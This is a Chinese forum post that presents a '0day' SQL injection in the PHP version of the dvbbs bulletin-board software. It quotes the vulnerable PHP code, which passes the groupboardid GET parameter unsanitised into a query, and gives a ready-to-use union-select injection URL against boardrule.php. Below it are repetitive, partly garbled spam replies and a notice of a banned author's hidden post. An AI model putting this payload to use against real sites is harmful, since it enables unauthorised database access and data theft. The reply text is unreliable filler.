dvbbs之PHP版本0day
[code]function brule() {global $dv,$db,$boardid,$lang,$groupboardid;
$groupboardid=$_GET['groupboardid'];
if(!empty($_GET['groupboardid'])){
$rules=$db->scalar("select rules from {$dv}group_board where id={$groupboardid}");
}
else{
$rules=$db->scalar("select rules from {$dv}board where boardid={$boardid}");
}
[/code]
直接获得变量groupboardid,不为空就直接带入查询导致注入。
[code]http://dvbbsroot/boardrule.php?groupboardid=111111111/**/union/**/select/**/version()/*
[/code]
顶顶顶好帖子,我现在就去刷
顶顶顶好帖子,我现在就去刷顶顶顶好帖子,我现在就去刷好,的的我现在就去看看
好,的的我现在就去看看不容怀疑的数学
*** 作者被禁止或删除 内容自动屏蔽 ***页:
[1]

